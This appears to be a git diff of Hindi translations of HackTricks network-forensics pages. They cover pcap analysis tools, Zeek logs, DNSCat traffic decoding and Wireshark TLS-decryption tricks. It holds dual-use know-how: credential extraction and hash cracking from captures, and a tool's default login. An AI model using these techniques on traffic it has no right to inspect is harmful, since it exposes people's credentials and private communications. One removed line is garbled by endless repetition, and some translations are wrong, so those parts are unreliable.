* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** हैकट्रिक्स और हैकट्रिक्स क्लाउड गिटहब रेपो में पीआर जमा करके।
* **जुड़ें** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके।
</details>

View file

@ -6,11 +6,11 @@
HackTricks का समर्थन करने के अन्य तरीके:
* अगर आप अपनी कंपनी का विज्ञापन **HackTricks** में देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन **The PEASS Family** की खोज करें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** द्वारा **PRs** सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **हमें** **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** द्वारा **PRs सबमिट** करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>
@ -21,12 +21,12 @@ HackTricks का समर्थन करने के अन्य तरी
{% embed url="https://www.rootedcon.com/" %}
{% hint style="info" %}
**PCAP** बनाम **PCAPNG** के बारे में एक नोट: PCAP फ़ाइल प्रारूप के दो संस्करण हैं; **PCAPNG नया है और सभी उपकरणों द्वारा समर्थित नहीं है**। कुछ अन्य उपकरणों में इसके साथ काम करने के लिए आपको एक फ़ाइल को Wireshark या किसी अन्य संगत उपकरण का उपयोग करके PCAP से PCAPNG में कनवर्ट करने की आवश्यकता हो सकती है।
**PCAP** बनाम **PCAPNG** के बारे में एक नोट: PCAP फ़ाइल प्रारूप के दो संस्करण हैं; **PCAPNG नया है और सभी उपकरणों द्वारा समर्थित नहीं है**। कुछ अन्य उपकरणों में इसके साथ काम करने के लिए आपको एक फ़ाइल को Wireshark या किसी अन्य संगत उपकरण का उपयोग करके PCAP से PCAPNG में परिवर्तित करने की आवश्यकता हो सकती है।
{% endhint %}
## Pcap के लिए ऑनलाइन उपकरण
* यदि आपके pcap का हेडर **टूटा हुआ** है तो आपको इसे ठीक करने की कोशिश करनी चाहिए: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php)
* यदि आपके pcap का हेडर **टूटा हुआ** है तो आपको इसे ठीक करने के लिए यह आजमाना चाहिए: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php)
* [**PacketTotal**](https://packettotal.com) में pcap में **जानकारी** और **मैलवेयर** खोजें
* [**www.virustotal.com**](https://www.virustotal.com) और [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com) का उपयोग करके **दुष्ट गतिविधि** खोजें
@ -40,7 +40,7 @@ HackTricks का समर्थन करने के अन्य तरी
**यदि आप एक PCAP का विश्लेषण करने जा रहे हैं तो आपको मूल रूप से Wireshark का उपयोग कैसे करना है यह जानना चाहिए**
{% endhint %}
आप Wireshark ट्रिक्स में कुछ जानकारी यहाँ पा सकते हैं:
आप Wireshark में कुछ ट्रिक्स यहाँ पा सकते हैं:
{% content-ref url="wireshark-tricks.md" %}
[wireshark-tricks.md](wireshark-tricks.md)
@ -48,7 +48,7 @@ HackTricks का समर्थन करने के अन्य तरी
### Xplico Framework
[**Xplico** ](https://github.com/xplico/xplico)_(केवल लिनक्स)_ एक pcap का विश्लेषण कर सकता है और इससे जानकारी निकाल सकता है। उदाहरण के लिए, pcap फ़ाइल से Xplico, प्रत्येक ईमेल (POP, IMAP, और SMTP प्रोटोकॉल), सभी HTTP सामग्री, प्रत्येक VoIP कॉल (SIP), FTP, TFTP, और इत्यादि निकालता है।
[**Xplico** ](https://github.com/xplico/xplico)_(केवल लिनक्स)_ एक **pcap** का विश्लेषण कर सकता है और इससे जानकारी निकाल सकता है। उदाहरण के लिए, एक pcap फ़ाइल से Xplico, प्रत्येक ईमेल (POP, IMAP, और SMTP प्रोटोकॉल), सभी HTTP सामग्री, प्रत्येक VoIP कॉल (SIP), FTP, TFTP, और इत्यादि निकालता है।
**स्थापित करें**
```bash
@ -62,29 +62,27 @@ sudo apt-get install xplico
/etc/init.d/apache2 restart
/etc/init.d/xplico start
```
उपयुक्तता _**127.0.0.1:9876**_ के साथ पहुंचने के लिए _**xplico:xplico**_ क्रेडेंशियल का उपयोग करें।
पहुँच _**127.0.0.1:9876**_ के साथ पहुँचने के लिए पहुँचकर्ता _**xplico:xplico**_
फिर **नया मामला** बनाएं, मामले के अंदर **नई सत्र** बनाएं और **pcap** फ़ाइल **अपलोड** करें।
### NetworkMiner
Xplico की तरह यह एक उपकरण है जो pcaps से वस्तुओं का **विश्लेषण और निकालना** करने के लिए है। इसका एक मुफ्त संस्करण है जिसे आप [**यहाँ**](https://www.netresec.com/?page=NetworkMiner) से **डाउनलोड** कर सकते हैं। यह **Windows** के साथ काम करता है।\
यह उपकरण भी **पैकेट्स से अन्य जानकारी प्राप्त** करने के लिए उपयोगी है ताकि आप एक **तेज़ तरीके से** क्या हो रहा था उसे जान सकें
Xplico की तरह यह एक उपकरण है जो **pcaps से वस्तुओं का विश्लेषण और निकालना** करने के लिए है। इसका एक मुफ्त संस्करण है जिसे आप [**यहाँ**](https://www.netresec.com/?page=NetworkMiner) से **डाउनलोड** कर सकते हैं। यह **Windows** के साथ काम करता है।\
यह उपकरण भी **पैकेट्स से अन्य जानकारी प्राप्त** करने के लिए उपयोगी है ताकि एक **तेज़ तरीके से** क्या हो रहा था उसे पता चल सके
### NetWitness Investigator
आप [**यहाँ से NetWitness Investigator डाउनलोड कर सकते हैं**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(यह Windows में काम करता है)**।\
यह एक और उपयोगी उपकरण है जो **पैकेट्स का विश्लेषण** करता है और जानकारी को एक उपयोगी तरीके से **व्यवस्थित करता है** ताकि आप अंदर क्या हो रहा है उसे जान सकें।
![](<../../../.gitbook/assets/image (567) (1).png>)
यह एक और उपयोगी उपकरण है जो **पैकेट्स का विश्लेषण** करता है और जानकारी को एक उपयोगी तरीके से **व्यवस्थित करता है** ताकि **अंदर क्या हो रहा है** उसे पता चल सके।
### [BruteShark](https://github.com/odedshimon/BruteShark)
* उपयोगकर्ता नाम और पासवर्ड (HTTP, FTP, Telnet, IMAP, SMTP...) का निकालना और एन्कोडिंग
* प्रमाणीकरण हैश का निकालना और Hashcat का उपयोग करके उन्हें क्रैक करना (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...)
* एक विजुअल नेटवर्क आरेखित करना (नेटवर्क नोड्स और उपयोगकर्ता)
* DNS क्वेरी का निकालना
* सभी TCP और UDP सत्रों का पुनर्निर्माण
* उपयोगकर्ता नाम और पासवर्ड (HTTP, FTP, Telnet, IMAP, SMTP...) को निकालना और एन्कोड करना
* प्रमाणीकरण हैश निकालना और Hashcat का उपयोग करके उन्हें क्रैक करना (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...)
* एक दृश्यात्मक नेटवर्क आरेखित करना (नेटवर्क नोड्स और उपयोगकर्ता)
* DNS पूछताछ निकालना
* सभी TCP और UDP सत्रों का पुनर्निर्माण करना
* फ़ाइल कार्विंग
### Capinfos
@ -115,11 +113,11 @@ ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.
{% embed url="https://www.rootedcon.com/" %}
## जांच करें एक्सप्लॉइट्स/मैलवेयर
## जांच करें Exploits/Malware
### Suricata
**स्थापित करें और सेटअप करें**
**स्थापित और सेटअप**
```
apt-get install suricata
apt-get install oinkmaster
@ -130,19 +128,19 @@ oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules
```
suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
```
### YaraPcap
### यारापीसीएपी
[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) एक टूल है जो
* एक PCAP फ़ाइल पढ़ता है और Http Streams निकालता है।
* एक PCAP फ़ाइल पढ़ता है और Http स्ट्रीम्स निकालता है।
* किसी भी संपीडित स्ट्रीम को gzip डिफ़्लेट करता है
* हर फ़ाइल को yara के साथ स्कैन करता है
* हर फ़ाइल को यारा के साथ स्कैन करता है
* रिपोर्ट.txt लिखता है
* वैकल्पिक रूप से मिलने वाली फ़ाइलों को एक डिर में सहेजता है
### Malware Analysis
### मैलवेयर विश्लेषण
क्या आप किसी जाने-माने मैलवेयर के किसी भी आंकड़े का पता लगा सकते हैं:
जांच करें कि क्या आप किसी जाने-माने मैलवेयर का कोई आंकड़ा खोज सकते हैं:
{% content-ref url="../malware-analysis.md" %}
[malware-analysis.md](../malware-analysis.md)
@ -150,11 +148,11 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
## Zeek
> Zeek एक पैसिव, ओपन-सोर्स नेटवर्क ट्रैफ़िक विश्लेषक है। कई ऑपरेटर संदेश या दुराचार गतिविधि की जांच का समर्थन करने के लिए Zeek का उपयोग नेटवर्क सुरक्षा मॉनिटर (NSM) के रूप में करते हैं। Zeek नेटवर्क सुरक्षा डोमेन के अलावा एक व्यापक ट्रैफ़िक विश्लेषण कार्यों का समर्थन भी करता है, जिसमें प्रदर्शन मापन और ट्रबलशूटिंग शामिल है
> [Zeek](https://docs.zeek.org/en/master/about.html) एक पैसिव, ओपन-सोर्स नेटवर्क ट्रैफ़िक विश्लेषक है। कई ऑपरेटर्स संदेहात्मक या दुराचार गतिविधि की जांच का समर्थन करने के लिए Zeek का उपयोग नेटवर्क सुरक्षा मॉनिटर (NSM) के रूप में करते हैं। Zeek इसके अलावा सुरक्षा डोमेन के पार एक व्यापक ट्रैफ़िक विश्लेषण कार्यों का समर्थन भी करता है, जिसमें प्रदर्शन मापन और समस्या सुलझाने जैसे कार्य शामिल हैं
मूल रूप से, `zeek` द्वारा बनाए गए लॉग **pcaps** नहीं हैं। इसलिए आपको लॉग विश्लेषित करने के लिए **अन्य उपकरण** का उपयोग करना होगा जहां **जानकारी** pcaps के बारे में है।
मूल रूप से, `zeek` द्वारा बनाए गए लॉग **पीकैप्स** नहीं हैं। इसलिए आपको लॉग का विश्लेषण करने के लिए **अन्य उपकरण** का उपयोग करना होगा जहां **जानकारी** पीकैप्स के बारे में होती है।
### Connections Info
### कनेक्शन जानकारी
```bash
#Get info about longest connections (add "grep udp" to see only udp traffic)
#The longest connection might be of malware (constant reverse shell?)
@ -239,20 +237,20 @@ rita show-exploded-dns -H --limit 10 zeek_logs
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) स्पेन में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उफान मिलने का समारोह है।
[**RootedCON**](https://www.rootedcon.com/) स्पेन में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उबाऊ मिलन स्थल है।
{% embed url="https://www.rootedcon.com/" %}
<details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **जुड़ें** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) से या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>

View file

@ -13,9 +13,9 @@
</details>
अगर आपके पास **DNSCat द्वारा डेटा एक्सफिल्ट्रेट करने वाला pcap** है (एन्क्रिप्शन का उपयोग न करते हुए), तो आप एक्सफिल्ट्रेट किए गए सामग्री को खोज सकते हैं।
अगर आपके पास **DNSCat द्वारा डेटा निकाला जा रहा pcap** है (एन्क्रिप्शन का उपयोग न करते हुए), तो आप निकाले गए सामग्री को खोज सकते हैं।
आपको सिर्फ यह पता होना चाहिए कि **पहले 9 बाइट** वास्तविक डेटा नहीं हैं लेकिन **C\&C संचार** से संबंधित हैं:
आपको सिर्फ यह पता होना चाहिए कि **पहले 9 बाइट** वास्तविक डेटा नहीं हैं बल्कि **C\&C संचार** से संबंधित हैं:
```python
from scapy.all import rdpcap, DNSQR, DNSRR
import struct
@ -38,7 +38,7 @@ For more information: [https://github.com/jrmdev/ctf-writeups/tree/master/bsides
[https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md](https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md)
एक स्क्रिप्ट है जो Python3 के साथ काम करता है: https://github.com/josemlwdf/DNScat-Decoder
एक स्क्रिप्ट है जो Python3 के साथ काम करता है: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder)
```
python3 dnscat_decoder.py sample.pcap bad_domain
```
@ -52,6 +52,6 @@ python3 dnscat_decoder.py sample.pcap bad_domain
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github repos में PRs सबमिट करके
</details>

View file

@ -1,6 +1,6 @@
# वायरशार्क ट्रिक्स
# Wireshark tricks
## वायरशार्क ट्रिक्स
## Wireshark tricks
<details>
@ -8,19 +8,19 @@
HackTricks का समर्थन करने के अन्य तरीके:
* अगर आप अपनी कंपनी की विज्ञापनित करना चाहते हैं **HackTricks** में या **HackTricks** को **PDF** में डाउनलोड करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन **The PEASS Family** की खोज करें
* अगर आप अपनी कंपनी की **विज्ञापनित करना चाहते हैं HackTricks** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सदस्यता योजनाएं देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS और HackTricks swag प्राप्त करें**](https://peass.creator-spring.com)
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह **The PEASS Family** की खोज करें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
* **HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PR जमा करके अपने हैकिंग ट्रिक्स साझा करें।
</details>
## अपने वायरशार्क कौशल को सुधारें
## अपनी Wireshark कौशल क्षमताएँ सुधारें
### ट्यूटोरियल
निम्नलिखित ट्यूटोरियल शानदार हैं जिन्हें सीखने के लिए कुछ ठंडे मूल ट्रिक्स हैं:
निम्नलिखित ट्यूटोरियल कुछ शानदार मूलभूत ट्रिक्स सीखने के लिए हैं:
* [https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/](https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/)
* [https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/](https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/)
@ -29,39 +29,37 @@ HackTricks का समर्थन करने के अन्य तरी
### विशेषज्ञ सूचना
**विशेषज्ञ सूचना**
_**विश्लेषण** --> **विशेषज्ञ सूचना**_ पर क्लिक करने पर आपको पैकेट्स में क्या हो रहा है का **अवलोकन** मिलेगा:
![](<../../../.gitbook/assets/image (570).png>)
**संक्षिप्त पते**
_**सांख्यिकी --> संक्षिप्त पते**_ के तहत आपको कई **सूचनाएं** मिलेंगी जो वायरशार्क द्वारा "**संक्षेपित**" की गई थीं जैसे पोर्ट/परिवहन से प्रोटोकॉल, MAC से निर्माता आदि। संचार में क्या शामिल है यह जानना दिलचस्प है।
_**सांख्यिकी --> संक्षिप्त पते**_ के तहत आपको कई **सूचनाएं** मिलेंगी जो वायरशार्क द्वारा "**संक्षेपित**" की गई थीं, जैसे पोर्ट/परिवहन से प्रोटोकॉल, MAC से निर्माता आदि। संचार में क्या शामिल है यह जानना दिलचस्प है।
![](<../../../.gitbook/assets/image (571).png>)
**प्रोटोकॉल विहारक्रम**
**प्रोटोकॉल वर्गीकरण**
_**सांख्यिकी --> प्रोटोकॉल विहारक्रम**_ के तहत आपको संचार में शामिल **प्रोटोकॉल** और उनके बारे में डेटा मिलेगा।
_**सांख्यिकी --> प्रोटोकॉल वर्गीकरण**_ के तहत आपको संचार में शामिल **प्रोटोकॉल** मिलेंगे और उनके बारे में डेटा।
![](<../../../.gitbook/assets/image (572).png>)
**बातचीतें**
_**सांख्यिकी --> बातचीतें**_ के तहत आपको संचार में बातचीतों का **सारांश** और उनके बारे में डेटा मिलेगा।
_**सांख्यिकी --> बातचीतें**_ के तहत आपको संचार में बातचीतों का **सारांश** मिलेगा और उनके बारे में डेटा।
![](<../../../.gitbook/assets/image (573).png>)
**अंतबिंदु**
**अंत स्थल**
_**सांख्यिकी --> अंतबिंदु**_ के तहत आपको संचार में अंतबिंदुओं का **सारांश** और प्रत्येक के बारे में डेटा मिलेगा।
_**सांख्यिकी --> अंत स्थल**_ के तहत आपको संचार में अंत स्थलों का **सारांश** मिलेगा और प्रत्येक के बारे में डेटा।
![](<../../../.gitbook/assets/image (575).png>)
**DNS जानकारी**
_**सांख्यिकी --> DNS**_ के तहत आपको दर्ज की गई DNS अनुरोध के बारे में सांख्यिकी मिलेगी।
_**सांख्यिकी --> DNS**_ के तहत आपको कैप्चर किए गए DNS अनुरोधों के बारे में सांख्यिकी मिलेगी।
![](<../../../.gitbook/assets/image (577).png>)
@ -73,7 +71,7 @@ _**सांख्यिकी --> I/O ग्राफ**_ के तहत आ
### फ़िल्टर
यहाँ आपको प्रोटोकॉल के आधार पर वायरशार्क फ़िल्टर मिलेगा: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
यहाँ आप प्रोटोकॉल के आधार पर वायरशार्क फ़िल्टर पा सकते हैं: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
अन्य दिलचस्प फ़िल्टर:
* `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)`
@ -85,9 +83,11 @@ _**सांख्यिकी --> I/O ग्राफ**_ के तहत आ
### खोज
अगर आप सत्रों के पैकेट्स में **सामग्री** खोजना चाहते हैं तो _CTRL+f_ दबाएं। आप मुख्य सूचना पट्टी में नई लेयर जोड़ सकते हैं (संख्या, समय, स्रोत, आदि) दाएं बटन दबाकर और फिर संपादन स्तंभ दबाकर।
अगर आप सत्रों के पैकेट्स में **सामग्री** की **खोज** करना चाहते हैं तो _CTRL+f_ दबाएं। आप मुख्य सूचना पट्टी में नई लेयर जोड़ सकते हैं (संख्या, समय, स्रोत, आदि) दाएं बटन दबाकर और फिर संपादन स्तंभ दबाकर।
अभ्यास: [https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net)
### मुफ्त pcap लैब्स
**मुफ्त चुनौतियों के साथ अभ्यास करें: [https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net)**
## डोमेन्स की पहचान
@ -103,7 +103,7 @@ _**सांख्यिकी --> I/O ग्राफ**_ के तहत आ
### DHCP से
वर्तमान वायरशार्क में `bootp` की बजाय `DHCP` की खोज करनी होगी
वर्तमान Wireshark में `bootp` की बजाय `DHCP` की खोज करनी होगी
![](<../../../.gitbook/assets/image (404).png>)
@ -115,16 +115,29 @@ _**सांख्यिकी --> I/O ग्राफ**_ के तहत आ
### सर्वर निजी कुंजी के साथ https ट्रैफिक की डिक्रिप्शन
_संपादन>प्राथमिकता>प्रोटोकॉल>ssl>_
_edit>preference>protocol>ssl>_
![](<../../../.gitbook/assets/image (98).png>)
_संपादित_ पर क्लिक करें और सर्वर और निजी कुंजी के सभी डेटा को जोड़ें (_IP, पोर्ट, प्रोटोकॉल, कुंजी फ़ाइल और पासवर्ड_)
_Edit_ दबाएं और सर्वर और निजी कुंजी के सभी डेटा को जोड़ें (_IP, पोर्ट, प्रोटोकॉल, कुंजी फ़ाइल और पासवर्ड_)
### सममेत्र सत्र कुंजियों के साथ https ट्रैफिक की डिक्रिप्शन
### सममित सत्र कुंजियों के साथ https ट्रैफिक की डिक्रिप्शन
यह पता चलता है कि Firefox और Chrome दोनों TLS ट्रैफिक को एनक्रिप्ट करने के लिए उपयोग किए गए सममेत्र सत्र कुंजी को एक फ़ाइल में लॉग करने का समर्थन करते हैं। फिर आप वायरशार्क को उस फ़ाइल पर पॉइंट कर सकते हैं और प्रेस्टो! डिक्रिप्टेड TLS ट्रैफिक। अधिक जानकारी के लिए: [https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/)\
इसे डिटेक्ट करने के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के लिए वायरशार्क में चरणों के ल
फायरफॉक्स और क्रोम दोनों के पास TLS सत्र कुंजियों को लॉग करने की क्षमता है, जिन्हें Wireshark के साथ ट्रांसपोर्ट करने के लिए उपयोग किया जा सकता है। यह सुरक्षित संचार का विस्तृत विश्लेषण संभव बनाता है। इस डिक्रिप्शन को कैसे किया जाए, इसके बारे में अधिक विवरण एक मार्गदर्शिका में मिल सकता है [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/).
इसे डिटेक्ट करने के लिए वातावरण में `SSLKEYLOGFILE` के लिए खोजें
एक साझा कुंजी की फ़ाइल इस तरह दिखेगी:
![](<../../../.gitbook/assets/image (99).png>)
इसे वायरशार्क में आयात करने के लिए जाएं \_edit > preference > protocol > ssl > और इसे (पूर्व)-मास्टर-सीक्रेट लॉग फ़ाइल नाम में आयात करें:
![](<../../../.gitbook/assets/image (100).png>)
## ADB संचार
जहां APK भेजा गया था, वहां से ADB संचार से APK निकालें:
```python
from scapy.all import *

View file

@ -6,17 +6,17 @@
दूसरे तरीके HackTricks का समर्थन करने के लिए:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github repos में PRs सबमिट करके।
* **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details>
<img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
<img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
यदि आप **हैकिंग करियर** में रुचि रखते हैं और अहैकेबल को हैक करना चाहते हैं - **हम भर्ती कर रहे हैं!** (_फ्लूएंट पोलिश लिखित और बोली जानी चाहिए_).
अगर आप **हैकिंग करियर** में रुचि रखते हैं और अहैकेबल को हैक करना चाहते हैं - **हम भर्ती कर रहे हैं!** (_फ्लूएंट पोलिश लिखित और बोली जानी चाहिए_).
{% embed url="https://www.stmcyber.com/careers" %}
@ -41,7 +41,7 @@ pyi-archive_viewer <binary>
? X binary_name
to filename? /tmp/binary.pyc
```
**Python exe binary** में कंपाइल किए गए फ़ाइल से **.pyc** प्राप्त कर सकते हैं द्वारा चलाने:
